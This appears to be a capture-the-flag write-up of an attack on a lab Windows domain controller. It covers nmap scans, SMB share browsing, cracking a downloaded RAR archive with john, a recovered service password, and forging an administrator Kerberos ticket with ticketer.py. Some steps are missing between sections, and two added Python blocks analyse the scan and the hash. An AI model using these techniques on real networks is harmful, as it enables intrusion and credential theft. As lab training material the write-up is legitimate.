Notes: Well, no more easy cakes. Hope you enjoy this one too.
Reconnaissance
```
⚡ root@kali ~/Desktop/test/listen11 nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:06 EST
Nmap scan report for 192.168.56.1
Host is up (0.00039s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00032s latency).
MAC Address: 08:00:27:F3:E1:79 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.126
Host is up (0.00068s latency).
MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds
```
```
⚡ root@kali ~/Desktop/test/listen11 nmap -sT -min-rate 10000 -p- 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:06 EST
Nmap scan report for 192.168.56.126
Host is up (0.00084s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49687/tcp open  unknown
MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC)
```
```
⚡ root@kali ~/Desktop/test/listen11 nmap -sT -A -T4 -O -p 80,135,139,445,389 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:10 EST
Nmap scan report for 192.168.56.126
Host is up (0.00061s latency).

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://soupedecode.local
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT      ADDRESS
1   10.61 ms 192.168.56.126

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.09 seconds
```
```
⚡ root@kali ~/Desktop/test/listen11 nmap -script=vuln -p 445,389,80,88 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:15 EST
Stats: 0:02:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 03:18 (0:00:01 remaining)
Nmap scan report for SOUPEDECODE.LOCAL0 (192.168.56.126)
Host is up (0.00069s latency).

PORT    STATE SERVICE
80/tcp  open  http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /icons/: Potentially interesting folder w/ directory listing
|   /licenses/: Potentially interesting directory w/ listing on 'apache/2.4.58 (win64) openssl/3.1.3 php/8.2.12'
|   /server-info/: Potentially interesting folder
|_  /server-status/: Potentially interesting folder
88/tcp  open  kerberos-sec
389/tcp open  ldap
445/tcp open  microsoft-ds
MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 321.27 seconds
```
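The port table above is the same output an administrator uses to confirm what a host actually exposes. As an added example (not code from the original writeup), the following Python parses the PORT/STATE/SERVICE rows from nmap's normal output and summarizes what they imply: the combination of Kerberos, LDAP, the global catalog and ADWS ports identifies the box as a domain controller, and SMB, MSRPC and WinRM are the remote-management surfaces an inventory should track. The sample text is an excerpt of the scan above; the DC_PORTS and MGMT_PORTS mappings are this example's own assumptions, not something nmap emits.

```python
"""Added example: parse nmap's port table and classify the host's role.
The sample scan text is copied from the full-port scan in the writeup;
DC_PORTS and MGMT_PORTS are this example's own assumptions."""
import re
from dataclasses import dataclass

# Constructed sample: an excerpt of the nmap -p- output shown above.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.56.126
Host is up (0.00084s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
"""

# Assumption: ports that together indicate an Active Directory domain controller.
DC_PORTS = {88: "Kerberos", 389: "LDAP", 464: "kpasswd", 636: "LDAPS",
            3268: "Global Catalog", 3269: "Global Catalog (TLS)", 9389: "ADWS"}

# Assumption: remote-management surfaces worth tracking on any Windows host.
MGMT_PORTS = {135: "MSRPC", 445: "SMB", 5985: "WinRM (HTTP)"}

# One PORT/STATE/SERVICE row of nmap normal output, e.g. "88/tcp open kerberos-sec".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str


def parse_ports(text: str) -> list[PortEntry]:
    """Return every PORT/STATE/SERVICE row found in nmap normal output."""
    return [PortEntry(int(p), proto, state, svc)
            for p, proto, state, svc in PORT_LINE.findall(text)]


def open_tcp_ports(entries: list[PortEntry]) -> set[int]:
    """Only rows nmap reported as open on TCP count toward the host's exposure."""
    return {e.port for e in entries if e.state == "open" and e.proto == "tcp"}


def classify_host(entries: list[PortEntry]) -> dict:
    """Summarize the host: DC or not, which AD services and which management ports are exposed."""
    opened = open_tcp_ports(entries)
    dc_hits = sorted(p for p in DC_PORTS if p in opened)
    mgmt_hits = sorted(p for p in MGMT_PORTS if p in opened)
    return {
        "open_count": len(opened),
        # Kerberos plus LDAP on one host is the minimal DC signature.
        "likely_domain_controller": 88 in opened and 389 in opened,
        "dc_services": [DC_PORTS[p] for p in dc_hits],
        "management_ports": [f"{p}/{MGMT_PORTS[p]}" for p in mgmt_hits],
    }


if __name__ == "__main__":
    for key, value in classify_host(parse_ports(SAMPLE_SCAN)).items():
        print(f"{key}: {value}")
```

Run on the sample, the summary reports 15 open TCP ports, flags the host as a likely domain controller with all seven AD service ports present, and lists 135/MSRPC, 445/SMB and 5985/WinRM as exposed management ports. Feeding the same function the output of a scan against a member server gives a quick diff against what that role should expose.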
```
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C               Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.126 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
The user flag can be found in the home directory of the websvc user.
```
smb: \users\> ls
  .                                  DR        0  Wed Nov  6 20:55:53 2024
  ..                                DHS        0  Tue Nov  5 18:30:29 2024
  Administrator                       D        0  Sat Jun 15 15:56:40 2024
  All Users                       DHSrn        0  Sat May  8 04:26:16 2021
  Default                           DHR        0  Sat Jun 15 22:51:08 2024
  Default User                    DHSrn        0  Sat May  8 04:26:16 2021
  desktop.ini                       AHS      174  Sat May  8 04:14:03 2021
  fjudy998                            D        0  Wed Nov  6 20:55:33 2024
  ojake987                            D        0  Wed Nov  6 20:55:16 2024
  Public                             DR        0  Sat Jun 15 13:54:32 2024
  rtina979                            D        0  Wed Nov  6 20:54:39 2024
  websvc                              D        0  Wed Nov  6 20:44:11 2024
  xursula991                          D        0  Wed Nov  6 20:55:28 2024

		12942591 blocks of size 4096. 10834983 blocks available
```
```
smb: \Users\websvc\Desktop\> dir
  .                                  DR        0  Thu Nov  7 14:08:21 2024
  ..                                  D        0  Wed Nov  6 20:44:11 2024
  user.txt                            A       32  Thu Nov  7 05:07:55 2024

		12942591 blocks of size 4096. 10835331 blocks available
smb: \Users\websvc\Desktop\> mget user.txt
Get file user.txt? y
getting file \Users\websvc\Desktop\user.txt of size 32 as user.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
```
```
smb: \Users\rtina979\Documents\> ls
  .                                  DR        0  Thu Nov  7 17:35:52 2024
  ..                                  D        0  Wed Nov  6 20:54:39 2024
  My Music                        DHSrn        0  Wed Nov  6 20:54:39 2024
  My Pictures                     DHSrn        0  Wed Nov  6 20:54:39 2024
  My Videos                       DHSrn        0  Wed Nov  6 20:54:39 2024
  Report.rar                          A   712046  Thu Nov  7 08:35:49 2024

		12942591 blocks of size 4096. 11014679 blocks available
smb: \Users\rtina979\Documents\> get Report.rar
getting file \Users\rtina979\Documents\Report.rar of size 712046 as Report.rar (26744.4 KiloBytes/sec) (average 26744.5 KiloBytes/sec)
```
Crack the archive password with john.
```
⚡ root@kali ~/Desktop/test/DC04 rar2john Report.rar > hash
⚡ root@kali ~/Desktop/test/DC04 cat hash
Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5
⚡ root@kali ~/Desktop/test/DC04 john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PASSWORD123      (Report.rar)
1g 0:00:01:29 DONE (2025-02-14 07:27) 0.01115g/s 573.9p/s 573.9c/s 573.9C/s chitra..2pac4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
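The hash line rar2john wrote encodes everything john needs: the 16-byte salt, the KDF round count as a power of two (15, hence the "32768" john reports as its cost), the 16-byte IV and the 8-byte password-check value. As an added example (not part of the original writeup), the Python below parses that line, checks each field against its declared length, times one PBKDF2-HMAC-SHA256 run with the archive's own salt and round count, and estimates how long the observed 573.9 p/s rate needs to exhaust rockyou. The hash string and crack rate are copied from the output above; ROCKYOU_LINES is this example's assumption about the wordlist size. The point for a defender is in the numbers: 32768 rounds cap a cracker at a few hundred guesses per second per core, yet a dictionary word still falls in under two minutes, so the KDF only buys time for passwords that are not in a wordlist.

```python
"""Added example: parse a rar2john RAR5 hash line and put its KDF cost in context.
The hash and the 573.9 p/s rate come from the john output above; ROCKYOU_LINES is an
assumption about the size of /usr/share/wordlists/rockyou.txt."""
import hashlib
import time
from dataclasses import dataclass

# Copied from the rar2john output above.
SAMPLE_HASH = ("Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524"
               "$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5")

# Assumption: line count of the rockyou.txt shipped in Kali's wordlists package.
ROCKYOU_LINES = 14_344_391


@dataclass(frozen=True)
class Rar5Hash:
    filename: str
    salt: bytes
    iter_log2: int
    iv: bytes
    pswcheck: bytes

    @property
    def iterations(self) -> int:
        # RAR5 stores the KDF count as log2; 15 -> 32768 PBKDF2 rounds,
        # matching the "Cost 1 (iteration count)" line john printed.
        return 1 << self.iter_log2


def parse_rar5_hash(line: str) -> Rar5Hash:
    """Split '<file>:$rar5$<saltlen>$<salt>$<log2 rounds>$<iv>$<chklen>$<check>'
    into its fields and reject a line whose hex fields do not match their declared size."""
    filename, _, hash_part = line.partition(":")
    fields = hash_part.split("$")  # ['', 'rar5', saltlen, salt, log2, iv, chklen, check]
    if len(fields) != 8 or fields[1] != "rar5":
        raise ValueError("not a rar2john RAR5 hash line")
    salt_len, salt_hex, iter_log2, iv_hex, chk_len, chk_hex = fields[2:]
    salt, iv, pswcheck = bytes.fromhex(salt_hex), bytes.fromhex(iv_hex), bytes.fromhex(chk_hex)
    if len(salt) != int(salt_len) or len(pswcheck) != int(chk_len) or len(iv) != 16:
        raise ValueError("field length does not match its declared size")
    return Rar5Hash(filename, salt, int(iter_log2), iv, pswcheck)


def seconds_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Wall-clock seconds to try every candidate at the observed cracking rate."""
    return candidates / guesses_per_second


def time_one_guess(h: Rar5Hash, password: bytes = b"x") -> float:
    """Time a single PBKDF2-HMAC-SHA256 run with the archive's salt and round count.
    RAR5 derives its keys from this PBKDF2 chain (with a few extra rounds for the
    check values), so this dominates the cost of every candidate john tries."""
    t0 = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", password, h.salt, h.iterations, 32)
    return time.perf_counter() - t0


if __name__ == "__main__":
    h = parse_rar5_hash(SAMPLE_HASH)
    print(f"{h.filename}: salt={h.salt.hex()} rounds={h.iterations} check={h.pswcheck.hex()}")
    print(f"one PBKDF2 guess on this core: {time_one_guess(h) * 1000:.1f} ms")
    hours = seconds_to_exhaust(ROCKYOU_LINES, 573.9) / 3600
    print(f"all of rockyou at 573.9 p/s: {hours:.1f} h (PASSWORD123 fell after 1m29s)")
```

At the rate john reported, the whole of rockyou takes roughly seven hours on that machine; the archive survived 89 seconds only because its password sits near the top of the list.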
The password is PASSWORD123. The archive extracts to an HTML file: a penetration test report on the target.
We can pull some useful information from it.
```
file_svc:Password123!!
RID cycling: DC01$, boliver0, zximena1, emark2, isam3, wulysses4, etc.
```
```
[*] Creating basic skeleton ticket and PAC Infos
/root/.local/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for SOUPEDECODE.LOCAL/administrator
/root/.local/bin/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/root/.local/bin/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/root/.local/bin/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
/root/.local/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in administrator.ccache
```